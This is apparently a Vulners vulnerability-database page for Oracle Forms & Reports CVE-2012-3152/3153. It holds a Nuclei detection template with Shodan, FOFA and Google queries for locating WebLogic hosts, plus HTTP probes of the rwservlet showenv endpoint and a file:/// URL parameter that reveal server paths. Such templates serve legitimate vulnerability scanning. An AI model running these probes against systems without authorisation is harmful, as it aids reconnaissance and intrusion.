Vulners
Lucene search
Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
 | Oracle Forms and Reports 11.1 - Remote Exploit | 29 Jan 201400:00 | – | zdt |
| Oracle Reports Developer Version Release 9i to 10gr2 Database Disclosure | 29 Jan 201400:00 | – | zdt |
| Oracle Forms / Reports Remote Code Execution Exploit | 18 Feb 201400:00 | – | zdt |
 | Exploit for CVE-2012-3152 | 15 May 202620:47 | – | githubexploit |
 | CVE-2012-3153 | 16 Oct 201200:00 | – | attackerkb |
| CVE-2012-3152 | 16 Oct 201200:00 | – | attackerkb |
 | The vulnerability of the Oracle Reports Developer component of the Oracle Fusion Middleware software platform allows attackers to influence the integrity and confidentiality of the protected information. | 1 Dec 202100:00 | – | bdu_fstec |
 | CVE-2012-3152 | 18 Feb 201400:00 | – | circl |
| CVE-2012-3153 | 29 May 201815:50 | – | circl |
 | Oracle Fusion Middleware Unspecified Vulnerability | 3 Nov 202100:00 | – | cisa_kev |
10
id: CVE-2012-3153
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
author: Sid Ahmed MALAOUI @ Realistic Security
severity: medium
description: |
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
vectors related to Report Server Component.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
remediation: |
Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
- https://www.oracle.com/security-alerts/cpuoct2012.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2012-3153
cwe-id: NVD-CWE-noinfo
epss-score: 0.91652
epss-percentile: 0.99694
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: fusion_middleware
shodan-query:
- http.title:"weblogic"
- http.html:"weblogic application server"
fofa-query:
- title="weblogic"
- body="weblogic application server"
google-query: intitle:"weblogic"
tags: cve,cve2012,oracle,rce,edb,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Reports Servlet")'
- type: dsl
dsl:
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"
# digest: 4a0a00473045022100c88b58973fdd04f042310b33c9b5b51564b14c9f9ededde2c5e5428fafb0532a02202ee2e06bbf9b232049b0c9bb0c6d6421d1d3d6649a3e46a498c4580f5bd4fc2b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 26.4
CVSS 3.19.1
EPSS0.93535
SSVC